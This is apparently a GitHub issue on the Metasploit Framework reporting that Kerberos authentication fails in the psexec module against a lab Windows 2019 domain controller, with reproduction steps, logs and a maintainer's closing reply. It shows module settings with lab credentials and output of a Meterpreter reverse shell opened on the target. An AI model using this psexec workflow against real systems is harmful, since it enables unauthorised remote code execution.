Kerberos authentication not working with psexec on Windows 2019 Domain Controller

[jheysel-r7]

Steps to reproduce

This was reproduced on macOS 13.6.1 and Ubuntu 20.04.3

1. Promote a Windows 2019 Server (10.0.17763) to a domain controller
2. Start msfconsole
3. Do use windows/smb/psexec
4. Set the following options:

   set rhosts 172.16.199.100
   set SMBDomain demo.local
   set SMBUser Administrator
   set SMBPass N0tpassword!
   set SMB::Auth kerberos
   set Domaincontrollerrhost 172.16.199.100
   set SMB::Rhostname dc1.demo.local

5. Run the module.
6. Observe the following error gets raised: https://github.com/rapid7/metasploit-framework/blob/08a2a293a949d31c79e14df387e2d2405c27715d/lib/msf/core/exploit/remote/kerberos/client.rb#L306

   
   msf6 exploit(windows/smb/psexec) > run

[] Started reverse TCP handler on 172.16.199.1:4444 [] 172.16.199.100:445 - Connecting to the server... [] 172.16.199.100:445 - Authenticating to 172.16.199.100:445|demo.local as user 'Administrator'... [+] 172.16.199.100:445 - 172.16.199.100:88 - Received a valid TGT-Response [] 172.16.199.100:445 - 172.16.199.100:445 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20231109131033_default_172.16.199.100_mit.kerberos.cca_594207.bin [-] 172.16.199.100:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/psexec) > set SMB::Auth ntlm SMB::Auth => ntlm msf6 exploit(windows/smb/psexec) > run

[] Started reverse TCP handler on 172.16.199.1:4444 [] 172.16.199.100:445 - Connecting to the server... [] 172.16.199.100:445 - Authenticating to 172.16.199.100:445|demo.local as user 'Administrator'... [] 172.16.199.100:445 - Selecting PowerShell target [] 172.16.199.100:445 - Executing the payload... [] Sending stage (175686 bytes) to 172.16.199.100 [+] 172.16.199.100:445 - Service start timed out, OK if running a command or non-service executable... [*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.100:62944) at 2023-11-09 13:11:11 -0500

meterpreter > exit

7. Also note that when `SMB::Auth` is set to `ntlm` with the same `user/pass/rhost/domain` the module succeeds.

### Notes

When watching the module run over the wire, it looks like the encryption type being offered is `eTYPE-AES256-CTS-HMAC-SHA1-96`
![Screenshot 2023-11-10 at 1 04 53 PM](https://github.com/rapid7/metasploit-framework/assets/23320005/5964fc0d-59cc-4636-a5aa-d1a833f39924)

When checking to see what kind of encryption types were supported by the system: 

PS C:\Users\Administrator> Get-ADComputer -Filter * -Properties msDS-SupportedEncryptionTypes

DistinguishedName : CN=DC1,OU=Domain Controllers,DC=demo,DC=local DNSHostName : dc1.demo.local Enabled : True msDS-SupportedEncryptionTypes : 28 Name : DC1 ObjectClass : computer ObjectGUID : 8b68b840-8e7a-4d12-a052-ea49e8395534 SamAccountName : DC1$ SID : S-1-5-21-3907774564-2315225553-1676620424-1001 UserPrincipalName :

According to [Decrypting the Selection of Supported Kerberos Encryption Types](https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797) `28` denotes `RC4, AES 128, AES 256` 

PS C:\Users\Administrator> systeminfo

Host Name: DC1 OS Name: Microsoft Windows Server 2019 Standard OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation OS Configuration: Primary Domain Controller OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00429-00000-00001-AA815 Original Install Date: 11/7/2023, 11:35:23 AM System Boot Time: 11/9/2023, 1:54:42 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 2 Processor(s) Installed. 01: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz [02]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz BIOS Version: VMware, Inc. VMW71.00V.18452719.B64.2108091906, 8/9/2021 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 555 MB Virtual Memory: Max Size: 3,199 MB Virtual Memory: Available: 1,494 MB Virtual Memory: In Use: 1,705 MB Page File Location(s): C:\pagefile.sys Domain: demo.local Logon Server: \DC1 Hotfix(s): 1 Hotfix(s) Installed.

Network Card(s): 1 NIC(s) Installed. 01: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es)

                             [02]: fe80::c047:b65f:376f:17f1

Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

## Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

## Expected behavior

The module should authenticate to the target via kerberos.

## Current behavior

The module is failing and saying that `KDC has no support for encryption type` 

### Metasploit version

Framework: 6.3.38-dev-c855c56235 Console : 6.3.38-dev-c855c56235

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

[framework/database/local_db_service] url=[Filtered]

[framework/ui/console] ActiveModule=exploit/windows/smb/psexec

[windows/smb/psexec] SMBDomain=demo.local SMBUser=Administrator SMBPass=N0tpassword! SMB::Auth=kerberos SMB::Domaincontroller=172.16.199.100 DomainControllerRhost=172.16.199.100 SMB::Rhostname=dc1.demo.local RHOSTS=172.16.199.100 loglevel=3 WORKSPACE= VERBOSE=false WfsDelay=10 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RPORT=445 SSL=false SSLServerNameIndication= SSLVersion=Auto SSLVerifyMode=PEER SSLCipher= Proxies= CPORT= CHOST= ConnectTimeout=10 TCP::max_send_size=0 TCP::send_delay=0 DCERPC::max_frag_size=4096 DCERPC::fake_bind_multi=true DCERPC::fake_bind_multi_prepend=0 DCERPC::fake_bind_multi_append=0 DCERPC::smb_pipeio=rw DCERPC::ReadTimeout=10 NTLM::UseNTLMv2=true NTLM::UseNTLM2_session=true NTLM::SendLM=true NTLM::UseLMKey=false NTLM::SendNTLM=true NTLM::SendSPN=true SMB::pipe_evasion=false SMB::pipe_write_min_size=1 SMB::pipe_write_max_size=1024 SMB::pipe_read_min_size=1 SMB::pipe_read_max_size=1024 SMB::pad_data_level=0 SMB::pad_file_level=0 SMB::obscure_trans_pipe_level=0 SMBDirect=true SMBName=*SMBSERVER SMB::VerifySignature=false SMB::ChunkSize=500 SMB::Native_OS=Windows 2000 2195 SMB::Native_LM=Windows 2000 5.0 SMB::ProtocolVersion=1,2,3 SMB::AlwaysEncrypt=true KrbCacheMode=read-write SMB::Krb5Ccname= SMB::KrbOfferedEncryptionTypes=AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 SERVICE_NAME= SERVICE_DISPLAY_NAME= SERVICE_DESCRIPTION= SERVICE_PERSIST=false CMD::DELAY=3 Powershell::persist=false Powershell::prepend_sleep= Powershell::prepend_protections_bypass=auto Powershell::strip_comments=true Powershell::strip_whitespace=false Powershell::sub_vars=true Powershell::sub_funcs=false Powershell::exec_in_place=false Powershell::exec_rc4=false Powershell::remove_comspec=false Powershell::noninteractive=true Powershell::encode_final_payload=false Powershell::encode_inner_payload=false Powershell::wrap_double_quotes=true Powershell::no_equals=false Powershell::method=reflection EXE::EICAR=false EXE::Custom= EXE::Path= EXE::Template= EXE::Inject=false EXE::OldMethod=false EXE::FallBack=false MSI::EICAR=false MSI::Custom= MSI::Path= MSI::Template= MSI::UAC=false SMBSHARE= ALLOW_GUEST=false SERVICE_FILENAME= PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe SERVICE_STUB_ENCODER= LHOST=172.16.199.158 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false EnableStageEncoding=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true PrependMigrate=false PrependMigrateProc= EXITFUNC=thread PayloadBindPort= AutoLoadStdapi=true AutoVerifySessionTimeout=30 InitialAutoRunScript= AutoRunScript= AutoSystemInfo=true EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= AutoUnhookProcess=false MeterpreterDebugBuild=false MeterpreterDebugLogging=

</details>

##  Database Configuration

The database contains the following information:
<details>
<summary>Collapse</summary>

Session Type: postgresql selected, no connection

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

1772 use psexec 1773 use 4 1774 options 1775 rhosts 172.16.199.100 1776 set SMBdomain demo.local 1777 set SMBUser Administrator 1778 set SMBPass N0tpassword! 1779 options 1780 set SMB::Auth kerberos 1781 options 1782 set SMB::Domaincontroller 1783 set SMB::Domaincontroller 172.16.199.100 1784 set Domaincontrollerrhost 172.16.199.100 1785 advanced 1786 set SMB::Rhostname dc1.demo.local 1787 run 1788 option 1789 options 1790 set rhosts 172.16.199.100 1791 options 1792 run 1793 set loglevel 3 1794 debug

</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

[10/11/2023 13:30:06] [e(0)] core: No database definition for environment production [10/11/2023 13:30:24] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source: /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:in initialize' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:innew' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in driver' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:instart' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' ./msfconsole:23:in

' - ThreadError deadlock; recursive locking [10/11/2023 13:31:58] [e(0)] core: Module torchserve not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html [10/11/2023 13:34:25] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Interrupt - Interrupt [11/10/2023 08:45:34] [e(0)] core: No database definition for environment production [11/10/2023 08:45:55] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source: /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:in initialize' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:innew' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in driver' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:instart' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' ./msfconsole:23:in

' - ThreadError deadlock; recursive locking [11/10/2023 08:46:00] [e(0)] core: Module psexec not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html [11/10/2023 08:48:22] [e(0)] core: rhosts walker invalid - NoMethodError undefined method `scan' for nil:NilClass [11/10/2023 08:48:35] [e(0)] core: Rex::Proto::Kerberos::Model::Error::KerberosError Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type [11/10/2023 08:48:35] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type - Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type

</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

msf-ws.log does not exist.

</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

/home/msfuser/git/metasploit-framework/lib/rex/ui/interactive.rb:53:in interact' /home/msfuser/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1680:incmd_sessions' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in run_command' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:inblock in run_single' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in each' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:inrun_single' /home/msfuser/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:192:in cmd_exploit' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:inrun_command' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in block in run_single' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:ineach' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in run_single' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/shell.rb:168:inblock in run' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:31:in with_context' /home/msfuser/git/metasploit-framework/lib/rex/ui/text/shell.rb:133:inrun' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in start' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:instart' ./msfconsole:23:in <main>' [10/06/2023 12:46:41] [e(0)] core: Rex::TimeoutError Send timed out [10/10/2023 13:01:12] [e(0)] core: No database definition for environment production [10/10/2023 13:01:12] [d(0)] core: Updated user based module store [10/10/2023 13:03:29] [e(0)] core: Module pytorch not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html [10/10/2023 13:26:54] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Interrupt - Interrupt [10/10/2023 16:00:41] [e(0)] core: No database definition for environment production [10/10/2023 16:01:56] [e(0)] core: Module torchserver not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html [10/10/2023 16:03:10] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080). [10/10/2023 16:07:09] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Errno::ECONNRESET Connection reset by peer - Errno::ECONNRESET Connection reset by peer [10/11/2023 13:30:06] [e(0)] core: No database definition for environment production [10/11/2023 13:30:24] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source: /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:ininitialize' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in new' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:indriver' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in start' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:instart' ./msfconsole:23:in <main>' - ThreadError deadlock; recursive locking [10/11/2023 13:31:58] [e(0)] core: Module torchserve not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html [10/11/2023 13:34:25] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Interrupt - Interrupt [11/10/2023 08:45:34] [e(0)] core: No database definition for environment production [11/10/2023 08:45:55] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source: /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:ininitialize' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in new' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:indriver' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in start' /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:instart' ./msfconsole:23:in <main>' - ThreadError deadlock; recursive locking [11/10/2023 08:46:00] [e(0)] core: Module psexec not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html [11/10/2023 08:48:22] [e(0)] core: rhosts walker invalid - NoMethodError undefined methodscan' for nil:NilClass [11/10/2023 08:48:34] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [11/10/2023 08:48:35] [d(0)] core: Negotiated SMB version: SMB3 [11/10/2023 08:48:35] [e(0)] core: Rex::Proto::Kerberos::Model::Error::KerberosError Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type [11/10/2023 08:48:35] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type - Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type

</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

msf-ws.log does not exist.

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

Framework: 6.3.43-dev-6659684fdf Ruby: ruby 3.0.5p211 (2022-11-24 revision ba5cf0f7c5) [x86_64-linux] OpenSSL: OpenSSL 1.1.1f 31 Mar 2020 Install Root: /home/msfuser/git/metasploit-framework Session Type: postgresql selected, no connection Install Method: Git Clone

</details>

[smcintyre-r7]

Closed because we were unable to reproduce this after multiple attempts. We believe the issue may have been related to a configuration setting and thus not required a code change to the framework.

If the issue comes up again we'll reinvestigate.